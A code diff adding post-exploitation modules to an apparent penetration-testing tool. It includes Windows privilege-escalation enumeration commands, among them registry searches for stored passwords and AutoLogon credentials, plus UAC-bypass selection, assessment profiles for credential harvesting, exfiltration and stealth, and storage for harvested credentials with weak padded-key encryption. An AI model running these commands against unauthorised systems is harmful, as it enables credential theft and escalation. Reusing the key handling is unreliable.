+      "# Find unquoted service paths",
+      'wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\\\" | findstr /i /v """',
+      "",
+      "# Check service permissions (requires accesschk.exe)",
+      'accesschk.exe -uwcqv "Everyone" * /accepteula',
+      'accesschk.exe -uwcqv "Authenticated Users" * /accepteula',
+      "",
+      "# List services with weak permissions",
+      'for /f "tokens=2 delims=\'=\'" %a in (\'wmic service list full^|find /i "pathname"^|find /i /v "system32"\') do @echo %a >> services.txt',
+    ]
+  }
+
+  /**
+   * Generate registry enumeration commands.
+   */
+  export function getRegistryEnumerationCommands(): string[] {
+    return [
+      "# Check AlwaysInstallElevated",
+      "reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated 2>nul",
+      "reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated 2>nul",
+      "",
+      "# Check AutoLogon credentials",
+      "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" 2>nul",
+      "",
+      "# Check for stored passwords in registry",
+      "reg query HKLM /f password /t REG_SZ /s 2>nul",
+      "reg query HKCU /f password /t REG_SZ /s 2>nul",
+      "",
+      "# Check autorun keys",
+      "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 2>nul",
+      "reg query HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 2>nul",
+    ]
+  }
+
+  /**
+   * Generate token privilege enumeration commands.
+   */
+  export function getTokenEnumerationCommands(): string[] {
+    return [
+      "# Check current user privileges",
+      "whoami /priv",
+      "",
+      "# Check current user groups",
+      "whoami /groups",
+      "",
+      "# Check for admin rights",
+      "whoami /groups | findstr /i \"S-1-5-32-544\"",
+      "",
+      "# Key privileges to look for:",
+      "# - SeImpersonatePrivilege (Potato attacks)",
+      "# - SeAssignPrimaryTokenPrivilege (Potato attacks)",
+      "# - SeDebugPrivilege (Process injection)",
+      "# - SeBackupPrivilege (Read any file)",
+      "# - SeRestorePrivilege (Write any file)",
+      "# - SeTakeOwnershipPrivilege (Take ownership)",
+      "# - SeLoadDriverPrivilege (Load kernel drivers)",
+    ]
+  }
+
+  /**
+   * Generate UAC status check commands.
+   */
+  export function getUACEnumerationCommands(): string[] {
+    return [
+      "# Check UAC status",
+      "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA",
+      "",
+      "# Check UAC consent prompt behavior",
+      "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v ConsentPromptBehaviorAdmin",
+      "",
+      "# Values for ConsentPromptBehaviorAdmin:",
+      "# 0 - No prompt (UAC effectively disabled)",
+      "# 1 - Prompt for credentials on secure desktop",
+      "# 2 - Prompt for consent on secure desktop",
+      "# 3 - Prompt for credentials",
+      "# 4 - Prompt for consent",
+      "# 5 - Prompt for consent for non-Windows binaries (default)",
+      "",
+      "# Check if current process is elevated",
+      "net session >nul 2>&1 && echo Elevated || echo Not elevated",
+    ]
+  }
+
+  /**
+   * Generate DLL hijacking discovery commands.
+   */
+  export function getDLLHijackingCommands(): string[] {
+    return [
+      "# Common DLL hijacking locations:",
+      "# 1. Application directory (first in search order)",
+      "# 2. System32 (requires write access)",
+      "# 3. Windows directory",
+      "# 4. Current directory",
+      "# 5. PATH directories",
+      "",
+      "# Find writable directories in PATH",
+      "for %A in (\"%path:;=\";\"%\") do ( icacls \"%~A\" 2>nul | findstr /i \"(F) (M) (W) :/ everyone authenticated\" && echo %~A is writable)",
+      "",
+      "# Use Process Monitor to find DLL load attempts",
+      "# Filter: Result contains NAME NOT FOUND",
+      "# Filter: Path ends with .dll",
+      "",
+      "# Common hijackable DLLs:",
+      "# - version.dll",
+      "# - dwmapi.dll",
+      "# - uxtheme.dll",
+      "# - propsys.dll",
+      "# - secur32.dll",
+    ]
+  }
+
+  /**
+   * Analyze a service for privilege escalation potential.
+   */
+  export function analyzeService(
+    serviceName: string,
+    binaryPath: string,
+    startMode: string
+  ): PostExploitTypes.PrivescVector[] {
+    const vectors: PostExploitTypes.PrivescVector[] = []
+
+    // Check for unquoted path
+    if (binaryPath && !binaryPath.startsWith('"') && binaryPath.includes(" ") && !binaryPath.toLowerCase().startsWith("c:\\windows\\")) {
+      vectors.push({
+        id: `service_unquoted_${serviceName}_${Date.now()}`,
+        category: "service",
+        platform: "windows",
+        name: `Unquoted Service Path: ${serviceName}`,
+        description: `Service ${serviceName} has an unquoted path with spaces`,
+        risk: "high",
+        exploitability: "moderate",
+        target: binaryPath,
+        technique: SERVICE_EXPLOITS.unquoted_path.technique,
+        commands: SERVICE_EXPLOITS.unquoted_path.commands,
+        prerequisites: ["Write access to path directories", "Service restart capability or reboot"],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.UNQUOTED_PATH],
+        discoveredAt: Date.now(),
+      })
+    }
+
+    return vectors
+  }
+
+  /**
+   * Analyze token privileges for escalation potential.
+   */
+  export function analyzePrivileges(privileges: string[]): PostExploitTypes.PrivescVector[] {
+    const vectors: PostExploitTypes.PrivescVector[] = []
+
+    for (const priv of privileges) {
+      const privName = priv.trim()
+      const exploit = TOKEN_EXPLOITS[privName]
+
+      if (exploit) {
+        vectors.push({
+          id: `token_${privName}_${Date.now()}`,
+          category: "token",
+          platform: "windows",
+          name: `${privName} Exploitation`,
+          description: `Privilege ${privName} can be exploited for escalation`,
+          risk: privName === "SeImpersonatePrivilege" ? "critical" : "high",
+          exploitability: privName === "SeImpersonatePrivilege" ? "easy" : "moderate",
+          target: privName,
+          technique: exploit.technique,
+          commands: exploit.commands,
+          prerequisites: [`${privName} enabled`],
+          detectionRisk: "medium",
+          mitre: [PostExploitTypes.MITRE_PRIVESC.TOKEN_MANIPULATION],
+          notes: `Tools: ${exploit.tools.join(", ")}`,
+          discoveredAt: Date.now(),
+        })
+      }
+    }
+
+    return vectors
+  }
+
+  /**
+   * Get UAC bypass based on Windows version.
+   */
+  export function getUACBypasses(windowsVersion: string): PostExploitTypes.PrivescVector[] {
+    const vectors: PostExploitTypes.PrivescVector[] = []
+
+    for (const [key, bypass] of Object.entries(UAC_BYPASSES)) {
+      if (bypass.windowsVersions.some(v => windowsVersion.toLowerCase().includes(v.toLowerCase()))) {
+        vectors.push({
+          id: `uac_${key}_${Date.now()}`,
+          category: "uac_bypass",
+          platform: "windows",
+          name: bypass.name,
+          description: `UAC bypass using ${bypass.technique}`,
+          risk: "high",
+          exploitability: "easy",
+          target: "UAC",
+          technique: bypass.technique,
+          commands: bypass.commands,
+          prerequisites: ["Medium integrity process", "UAC not set to Always Notify"],
+          detectionRisk: "medium",
+          mitre: [PostExploitTypes.MITRE_PRIVESC.UAC_BYPASS],
+          notes: `Works on: ${bypass.windowsVersions.join(", ")}`,
+          discoveredAt: Date.now(),
+        })
+      }
+    }
+
+    return vectors
+  }
+
+  /**
+   * Get all discovery commands for Windows privilege escalation.
+   */
+  export function getAllDiscoveryCommands(): Record<string, string[]> {
+    return {
+      services: getServiceEnumerationCommands(),
+      registry: getRegistryEnumerationCommands(),
+      tokens: getTokenEnumerationCommands(),
+      uac: getUACEnumerationCommands(),
+      dllHijacking: getDLLHijackingCommands(),
+      scheduledTasks: [...SCHEDULED_TASK_EXPLOITS.discovery],
+    }
+  }
+
+  /**
+   * Format privesc vector for display.
+   */
+  export function formatVector(vector: PostExploitTypes.PrivescVector): string {
+    const lines: string[] = []
+    lines.push(`[${vector.risk.toUpperCase()}] ${vector.name}`)
+    lines.push(`Category: ${vector.category}`)
+    lines.push(`Target: ${vector.target}`)
+    lines.push(`Description: ${vector.description}`)
+    lines.push(`Technique: ${vector.technique}`)
+    lines.push(`Exploitability: ${vector.exploitability}`)
+    lines.push(`Detection Risk: ${vector.detectionRisk}`)
+    lines.push("")
+    lines.push("Commands:")
+    for (const cmd of vector.commands) {
+      lines.push(`  ${cmd}`)
+    }
+    if (vector.lolbas) {
+      lines.push("")
+      lines.push(`LOLBAS: ${vector.lolbas}`)
+    }
+    lines.push("")
+    lines.push(`MITRE ATT&CK: ${vector.mitre.join(", ")}`)
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/profiles.ts b/packages/opencode/src/pentest/postexploit/profiles.ts
new file mode 100644
index 00000000000..127bebfa262
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/profiles.ts
@@ -0,0 +1,366 @@
+/**
+ * @fileoverview Post-Exploitation Assessment Profiles
+ *
+ * Predefined assessment profiles for different post-exploitation scenarios
+ * with varying levels of stealth, depth, and module coverage.
+ *
+ * @module pentest/postexploit/profiles
+ */
+
+import { PostExploitTypes } from "./types"
+
+/**
+ * Post-exploitation profiles namespace.
+ */
+export namespace PostExploitProfiles {
+  /**
+   * Discovery profile - passive enumeration only.
+   *
+   * Use for initial reconnaissance without active exploitation.
+   * Focuses on identifying opportunities without taking action.
+   */
+  export const Discovery: PostExploitTypes.AssessmentProfile = {
+    id: "discovery",
+    name: "Discovery",
+    description: "Passive enumeration to identify post-exploitation opportunities",
+    modules: {
+      privesc: {
+        enabled: true,
+        depth: "basic",
+      },
+      lateral: {
+        enabled: true,
+        depth: "enum",
+      },
+      creds: {
+        enabled: true,
+        depth: "passive",
+      },
+      persist: {
+        enabled: true,
+        catalog: true,
+      },
+      exfil: {
+        enabled: true,
+        depth: "discover",
+      },
+      cleanup: {
+        enabled: true,
+        trackArtifacts: true,
+        generateChecklist: false,
+      },
+    },
+    stealth: true,
+    timeout: 30000,
+    rateLimit: 10,
+  }
+
+  /**
+   * Quick profile - fast assessment of critical vectors.
+   *
+   * Use for time-constrained engagements to identify
+   * the most impactful opportunities quickly.
+   */
+  export const Quick: PostExploitTypes.AssessmentProfile = {
+    id: "quick",
+    name: "Quick",
+    description: "Fast assessment focusing on critical privilege escalation vectors",
+    modules: {
+      privesc: {
+        enabled: true,
+        depth: "basic",
+        categories: ["suid", "sudo", "kernel", "service", "registry", "token"],
+      },
+      lateral: {
+        enabled: true,
+        depth: "basic",
+        methods: ["smb", "ssh", "rdp", "pass_the_hash"],
+      },
+      creds: {
+        enabled: true,
+        depth: "passive",
+      },
+      persist: {
+        enabled: false,
+        catalog: false,
+      },
+      exfil: {
+        enabled: false,
+        depth: "discover",
+      },
+      cleanup: {
+        enabled: true,
+        trackArtifacts: true,
+        generateChecklist: false,
+      },
+    },
+    stealth: false,
+    timeout: 30000,
+    rateLimit: 50,
+  }
+
+  /**
+   * Standard profile - balanced assessment.
+   *
+   * Use for typical penetration tests with comprehensive
+   * coverage and guided exploitation.
+   */
+  export const Standard: PostExploitTypes.AssessmentProfile = {
+    id: "standard",
+    name: "Standard",
+    description: "Comprehensive post-exploitation assessment with guided exploitation",
+    modules: {
+      privesc: {
+        enabled: true,
+        depth: "full",
+      },
+      lateral: {
+        enabled: true,
+        depth: "full",
+      },
+      creds: {
+        enabled: true,
+        depth: "guided",
+      },
+      persist: {
+        enabled: true,
+        catalog: true,
+      },
+      exfil: {
+        enabled: true,
+        depth: "full",
+      },
+      cleanup: {
+        enabled: true,
+        trackArtifacts: true,
+        generateChecklist: true,
+      },
+    },
+    stealth: false,
+    timeout: 60000,
+    rateLimit: 30,
+  }
+
+  /**
+   * Thorough profile - deep assessment.
+   *
+   * Use for comprehensive security assessments requiring
+   * maximum coverage and detailed analysis.
+   */
+  export const Thorough: PostExploitTypes.AssessmentProfile = {
+    id: "thorough",
+    name: "Thorough",
+    description: "Deep post-exploitation assessment with comprehensive coverage",
+    modules: {
+      privesc: {
+        enabled: true,
+        depth: "deep",
+      },
+      lateral: {
+        enabled: true,
+        depth: "deep",
+      },
+      creds: {
+        enabled: true,
+        depth: "deep",
+      },
+      persist: {
+        enabled: true,
+        catalog: true,
+      },
+      exfil: {
+        enabled: true,
+        depth: "full",
+      },
+      cleanup: {
+        enabled: true,
+        trackArtifacts: true,
+        generateChecklist: true,
+      },
+    },
+    stealth: false,
+    timeout: 120000,
+    rateLimit: 20,
+  }
+
+  /**
+   * Stealth profile - low-noise operations.
+   *
+   * Use when detection evasion is critical. Passive techniques
+   * only with minimal footprint.
+   */
+  export const Stealth: PostExploitTypes.AssessmentProfile = {
+    id: "stealth",
+    name: "Stealth",
+    description: "Low-noise assessment with passive techniques only",
+    modules: {
+      privesc: {
+        enabled: true,
+        depth: "passive",
+      },
+      lateral: {
+        enabled: true,
+        depth: "passive",
+      },
+      creds: {
+        enabled: true,
+        depth: "passive",
+      },
+      persist: {
+        enabled: false,
+        catalog: false,
+      },
+      exfil: {
+        enabled: true,
+        depth: "passive",
+      },
+      cleanup: {
+        enabled: true,
+        trackArtifacts: true,
+        generateChecklist: true,
+      },
+    },
+    stealth: true,
+    timeout: 60000,
+    rateLimit: 5,
+  }
+
+  /**
+   * All available profiles.
+   */
+  export const All: Record<PostExploitTypes.ProfileId, PostExploitTypes.AssessmentProfile> = {
+    discovery: Discovery,
+    quick: Quick,
+    standard: Standard,
+    thorough: Thorough,
+    stealth: Stealth,
+  }
+
+  /**
+   * Get a profile by ID.
+   */
+  export function get(id: PostExploitTypes.ProfileId): PostExploitTypes.AssessmentProfile | undefined {
+    return All[id]
+  }
+
+  /**
+   * List all profiles.
+   */
+  export function list(): PostExploitTypes.AssessmentProfile[] {
+    return Object.values(All)
+  }
+
+  /**
+   * Create a custom profile with overrides.
+   */
+  export function createCustom(
+    base: PostExploitTypes.ProfileId,
+    overrides: Partial<Omit<PostExploitTypes.AssessmentProfile, "id">>
+  ): PostExploitTypes.AssessmentProfile {
+    const baseProfile = get(base) || Standard
+    return {
+      ...baseProfile,
+      ...overrides,
+      id: baseProfile.id, // Keep original ID
+      modules: {
+        privesc: { ...baseProfile.modules.privesc, ...overrides.modules?.privesc },
+        lateral: { ...baseProfile.modules.lateral, ...overrides.modules?.lateral },
+        creds: { ...baseProfile.modules.creds, ...overrides.modules?.creds },
+        persist: { ...baseProfile.modules.persist, ...overrides.modules?.persist },
+        exfil: { ...baseProfile.modules.exfil, ...overrides.modules?.exfil },
+        cleanup: { ...baseProfile.modules.cleanup, ...overrides.modules?.cleanup },
+      },
+    }
+  }
+
+  /**
+   * Format profile for display.
+   */
+  export function format(profile: PostExploitTypes.AssessmentProfile): string {
+    const lines: string[] = []
+    lines.push(`Profile: ${profile.name} (${profile.id})`)
+    lines.push(`Description: ${profile.description}`)
+    lines.push(`Stealth Mode: ${profile.stealth ? "Yes" : "No"}`)
+    lines.push("")
+    lines.push("Modules:")
+    lines.push(`  Privilege Escalation: ${profile.modules.privesc.enabled ? profile.modules.privesc.depth : "Disabled"}`)
+    lines.push(`  Lateral Movement: ${profile.modules.lateral.enabled ? profile.modules.lateral.depth : "Disabled"}`)
+    lines.push(`  Credential Harvesting: ${profile.modules.creds.enabled ? profile.modules.creds.depth : "Disabled"}`)
+    lines.push(`  Persistence: ${profile.modules.persist.enabled ? (profile.modules.persist.catalog ? "Catalog" : "Enabled") : "Disabled"}`)
+    lines.push(`  Data Exfiltration: ${profile.modules.exfil.enabled ? profile.modules.exfil.depth : "Disabled"}`)
+    lines.push(`  Cleanup: ${profile.modules.cleanup.enabled ? "Enabled" : "Disabled"}`)
+
+    if (profile.timeout) {
+      lines.push("")
+      lines.push(`Timeout: ${profile.timeout / 1000}s`)
+    }
+    if (profile.rateLimit) {
+      lines.push(`Rate Limit: ${profile.rateLimit} ops/sec`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format all profiles as a summary table.
+   */
+  export function formatTable(): string {
+    const lines: string[] = []
+    lines.push("| Profile | Privesc | Lateral | Creds | Persist | Exfil | Cleanup | Stealth |")
+    lines.push("|---------|---------|---------|-------|---------|-------|---------|---------|")
+
+    for (const profile of list()) {
+      const privesc = profile.modules.privesc.enabled ? profile.modules.privesc.depth : "-"
+      const lateral = profile.modules.lateral.enabled ? profile.modules.lateral.depth : "-"
+      const creds = profile.modules.creds.enabled ? profile.modules.creds.depth : "-"
+      const persist = profile.modules.persist.enabled ? (profile.modules.persist.catalog ? "catalog" : "yes") : "-"
+      const exfil = profile.modules.exfil.enabled ? profile.modules.exfil.depth : "-"
+      const cleanup = profile.modules.cleanup.enabled ? (profile.modules.cleanup.generateChecklist ? "full" : "track") : "-"
+      const stealth = profile.stealth ? "yes" : "no"
+
+      lines.push(`| ${profile.id.padEnd(9)} | ${privesc.padEnd(7)} | ${lateral.padEnd(7)} | ${creds.padEnd(5)} | ${persist.padEnd(7)} | ${exfil.padEnd(5)} | ${cleanup.padEnd(7)} | ${stealth.padEnd(7)} |`)
+    }
+
+    lines.push("")
+    lines.push("Depth levels:")
+    lines.push("  privesc: basic, full, deep, passive")
+    lines.push("  lateral: enum, basic, full, deep, passive")
+    lines.push("  creds: passive, guided, deep")
+    lines.push("  exfil: discover, full, passive")
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get profile recommendations based on context.
+   */
+  export function recommend(context: {
+    timeConstraint?: "low" | "medium" | "high"
+    stealthRequired?: boolean
+    focusAreas?: ("privesc" | "lateral" | "creds" | "persist" | "exfil")[]
+  }): PostExploitTypes.ProfileId {
+    // Stealth takes priority
+    if (context.stealthRequired) {
+      return "stealth"
+    }
+
+    // Time constraints
+    if (context.timeConstraint === "low") {
+      return "quick"
+    }
+
+    if (context.timeConstraint === "high") {
+      return "thorough"
+    }
+
+    // Focus areas - if only discovery needed
+    if (context.focusAreas && context.focusAreas.length === 1) {
+      if (context.focusAreas[0] === "privesc") {
+        return "quick" // Quick focuses on privesc
+      }
+    }
+
+    // Default to standard
+    return "standard"
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/storage.ts b/packages/opencode/src/pentest/postexploit/storage.ts
new file mode 100644
index 00000000000..19e7a54b0be
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/storage.ts
@@ -0,0 +1,730 @@
+/**
+ * @fileoverview Post-Exploitation Storage
+ *
+ * Storage helpers for post-exploitation sessions, vectors, credentials,
+ * persistence mechanisms, and artifacts.
+ *
+ * @module pentest/postexploit/storage
+ */
+
+import { randomBytes, createCipheriv, createDecipheriv } from "crypto"
+import { Storage } from "../../storage/storage"
+import { PostExploitTypes } from "./types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "postexploit.storage" })
+
+/**
+ * Generate a unique session ID.
+ */
+function generateSessionId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `postexploit_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique vector/item ID.
+ */
+function generateItemId(prefix: string): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(4).toString("hex")
+  return `${prefix}_${timestamp}_${random}`
+}
+
+/**
+ * Storage configuration.
+ */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+  encryptionKey?: string
+}
+
+/**
+ * Simple encryption for credential storage.
+ */
+function encryptValue(value: string, key: string): string {
+  const iv = randomBytes(16)
+  const cipher = createCipheriv("aes-256-cbc", Buffer.from(key.padEnd(32, "0").slice(0, 32)), iv)
+  let encrypted = cipher.update(value, "utf8", "hex")
+  encrypted += cipher.final("hex")
+  return iv.toString("hex") + ":" + encrypted
+}
+
+function decryptValue(encrypted: string, key: string): string {
+  const parts = encrypted.split(":")
+  if (parts.length !== 2) return encrypted
+  const iv = Buffer.from(parts[0], "hex")
+  const decipher = createDecipheriv("aes-256-cbc", Buffer.from(key.padEnd(32, "0").slice(0, 32)), iv)
+  let decrypted = decipher.update(parts[1], "hex", "utf8")
+  decrypted += decipher.final("utf8")
+  return decrypted
+}
+
+/**
+ * Post-exploitation storage namespace.
+ */
+export namespace PostExploitStorage {
+  /** In-memory buffers for testing */
+  const sessionBuffer: PostExploitTypes.PostExploitSession[] = []
+  const credentialBuffer: PostExploitTypes.HarvestedCredential[] = []
+  const artifactBuffer: PostExploitTypes.Artifact[] = []
+
+  // ========== Sessions ==========
+
+  /**
+   * Save a post-exploitation session.
+   */
+  export async function saveSession(
+    session: Omit<PostExploitTypes.PostExploitSession, "id"> | PostExploitTypes.PostExploitSession,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.PostExploitSession> {
+    const full: PostExploitTypes.PostExploitSession = {
+      ...session,
+      id: "id" in session && session.id ? session.id : generateSessionId(),
+    }
+    const validated = PostExploitTypes.PostExploitSession.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = sessionBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        sessionBuffer[existingIdx] = validated
+      } else {
+        sessionBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "postexploit", "sessions", validated.id], validated)
+    }
+
+    log.info("Post-exploitation session saved", {
+      id: validated.id,
+      target: validated.target,
+      platform: validated.platform,
+      profile: validated.profile,
+      status: validated.status,
+    })
+    return validated
+  }
+
+  /**
+   * Get a session by ID.
+   */
+  export async function getSession(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.PostExploitSession | null> {
+    if (config.storage === "memory") {
+      return sessionBuffer.find((s) => s.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<PostExploitTypes.PostExploitSession>([
+        "pentest",
+        "postexploit",
+        "sessions",
+        id,
+      ])
+      return PostExploitTypes.PostExploitSession.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List sessions with filters.
+   */
+  export async function listSessions(
+    config: StorageConfig = {},
+    filters?: {
+      target?: string
+      platform?: PostExploitTypes.Platform
+      profile?: PostExploitTypes.ProfileId
+      status?: PostExploitTypes.Status
+      limit?: number
+    }
+  ): Promise<PostExploitTypes.PostExploitSession[]> {
+    let sessions: PostExploitTypes.PostExploitSession[]
+
+    if (config.storage === "memory") {
+      sessions = [...sessionBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "postexploit", "sessions"])
+      sessions = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<PostExploitTypes.PostExploitSession>(key)
+          sessions.push(PostExploitTypes.PostExploitSession.parse(data))
+        } catch {
+          log.warn("Failed to parse session file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.target) {
+      sessions = sessions.filter((s) => s.target === filters.target)
+    }
+    if (filters?.platform) {
+      sessions = sessions.filter((s) => s.platform === filters.platform)
+    }
+    if (filters?.profile) {
+      sessions = sessions.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      sessions = sessions.filter((s) => s.status === filters.status)
+    }
+
+    // Sort by start time (newest first)
+    sessions.sort((a, b) => b.startedAt - a.startedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      sessions = sessions.slice(0, filters.limit)
+    }
+
+    return sessions
+  }
+
+  /**
+   * Delete a session.
+   */
+  export async function deleteSession(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = sessionBuffer.findIndex((s) => s.id === id)
+      if (idx >= 0) {
+        sessionBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "postexploit", "sessions", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Update session status.
+   */
+  export async function updateSessionStatus(
+    id: string,
+    status: PostExploitTypes.Status,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.PostExploitSession | null> {
+    const session = await getSession(id, config)
+    if (!session) return null
+
+    const updated: PostExploitTypes.PostExploitSession = {
+      ...session,
+      status,
+      ...(status === "completed" || status === "failed" ? { endedAt: Date.now() } : {}),
+    }
+
+    return saveSession(updated, config)
+  }
+
+  // ========== Credentials ==========
+
+  /**
+   * Save a harvested credential.
+   */
+  export async function saveCredential(
+    cred: Omit<PostExploitTypes.HarvestedCredential, "id"> | PostExploitTypes.HarvestedCredential,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.HarvestedCredential> {
+    const full: PostExploitTypes.HarvestedCredential = {
+      ...cred,
+      id: "id" in cred && cred.id ? cred.id : generateItemId("cred"),
+    }
+
+    // Encrypt value if encryption key is provided
+    if (config.encryptionKey && full.value && !full.valueRedacted) {
+      full.value = encryptValue(full.value, config.encryptionKey)
+    }
+
+    const validated = PostExploitTypes.HarvestedCredential.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = credentialBuffer.findIndex((c) => c.id === validated.id)
+      if (existingIdx >= 0) {
+        credentialBuffer[existingIdx] = validated
+      } else {
+        credentialBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "postexploit", "credentials", validated.id], validated)
+    }
+
+    log.info("Credential saved", {
+      id: validated.id,
+      type: validated.type,
+      source: validated.source,
+      username: validated.username,
+      host: validated.host,
+    })
+    return validated
+  }
+
+  /**
+   * Get a credential by ID.
+   */
+  export async function getCredential(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.HarvestedCredential | null> {
+    let cred: PostExploitTypes.HarvestedCredential | null = null
+
+    if (config.storage === "memory") {
+      cred = credentialBuffer.find((c) => c.id === id) || null
+    } else {
+      try {
+        const data = await Storage.read<PostExploitTypes.HarvestedCredential>([
+          "pentest",
+          "postexploit",
+          "credentials",
+          id,
+        ])
+        cred = PostExploitTypes.HarvestedCredential.parse(data)
+      } catch (err) {
+        if (err instanceof Storage.NotFoundError) {
+          return null
+        }
+        throw err
+      }
+    }
+
+    // Decrypt value if encryption key is provided
+    if (cred && config.encryptionKey && cred.value && !cred.valueRedacted) {
+      try {
+        cred = { ...cred, value: decryptValue(cred.value, config.encryptionKey) }
+      } catch {
+        // If decryption fails, return as-is
+      }
+    }
+
+    return cred
+  }
+
+  /**
+   * List credentials with filters.
+   */
+  export async function listCredentials(
+    config: StorageConfig = {},
+    filters?: {
+      host?: string
+      type?: PostExploitTypes.CredentialType
+      source?: PostExploitTypes.CredentialSource
+      username?: string
+      valid?: boolean
+      limit?: number
+    }
+  ): Promise<PostExploitTypes.HarvestedCredential[]> {
+    let creds: PostExploitTypes.HarvestedCredential[]
+
+    if (config.storage === "memory") {
+      creds = [...credentialBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "postexploit", "credentials"])
+      creds = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<PostExploitTypes.HarvestedCredential>(key)
+          creds.push(PostExploitTypes.HarvestedCredential.parse(data))
+        } catch {
+          log.warn("Failed to parse credential file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.host) {
+      creds = creds.filter((c) => c.host === filters.host)
+    }
+    if (filters?.type) {
+      creds = creds.filter((c) => c.type === filters.type)
+    }
+    if (filters?.source) {
+      creds = creds.filter((c) => c.source === filters.source)
+    }
+    if (filters?.username) {
+      creds = creds.filter((c) => c.username === filters.username)
+    }
+    if (filters?.valid !== undefined) {
+      creds = creds.filter((c) => c.valid === filters.valid)
+    }
+
+    // Sort by harvest time (newest first)
+    creds.sort((a, b) => b.harvestedAt - a.harvestedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      creds = creds.slice(0, filters.limit)
+    }
+
+    return creds
+  }
+
+  // ========== Artifacts ==========
+
+  /**
+   * Save an artifact.
+   */
+  export async function saveArtifact(
+    artifact: Omit<PostExploitTypes.Artifact, "id"> | PostExploitTypes.Artifact,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.Artifact> {
+    const full: PostExploitTypes.Artifact = {
+      ...artifact,
+      id: "id" in artifact && artifact.id ? artifact.id : generateItemId("artifact"),
+    }
+    const validated = PostExploitTypes.Artifact.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = artifactBuffer.findIndex((a) => a.id === validated.id)
+      if (existingIdx >= 0) {
+        artifactBuffer[existingIdx] = validated
+      } else {
+        artifactBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "postexploit", "artifacts", validated.id], validated)
+    }
+
+    log.info("Artifact saved", {
+      id: validated.id,
+      type: validated.type,
+      path: validated.path,
+      createdBy: validated.createdBy,
+    })
+    return validated
+  }
+
+  /**
+   * Get an artifact by ID.
+   */
+  export async function getArtifact(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.Artifact | null> {
+    if (config.storage === "memory") {
+      return artifactBuffer.find((a) => a.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<PostExploitTypes.Artifact>([
+        "pentest",
+        "postexploit",
+        "artifacts",
+        id,
+      ])
+      return PostExploitTypes.Artifact.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List artifacts with filters.
+   */
+  export async function listArtifacts(
+    config: StorageConfig = {},
+    filters?: {
+      type?: PostExploitTypes.ArtifactType
+      platform?: PostExploitTypes.Platform
+      cleaned?: boolean
+      limit?: number
+    }
+  ): Promise<PostExploitTypes.Artifact[]> {
+    let artifacts: PostExploitTypes.Artifact[]
+
+    if (config.storage === "memory") {
+      artifacts = [...artifactBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "postexploit", "artifacts"])
+      artifacts = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<PostExploitTypes.Artifact>(key)
+          artifacts.push(PostExploitTypes.Artifact.parse(data))
+        } catch {
+          log.warn("Failed to parse artifact file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.type) {
+      artifacts = artifacts.filter((a) => a.type === filters.type)
+    }
+    if (filters?.platform) {
+      artifacts = artifacts.filter((a) => a.platform === filters.platform)
+    }
+    if (filters?.cleaned !== undefined) {
+      artifacts = artifacts.filter((a) => a.cleaned === filters.cleaned)
+    }
+
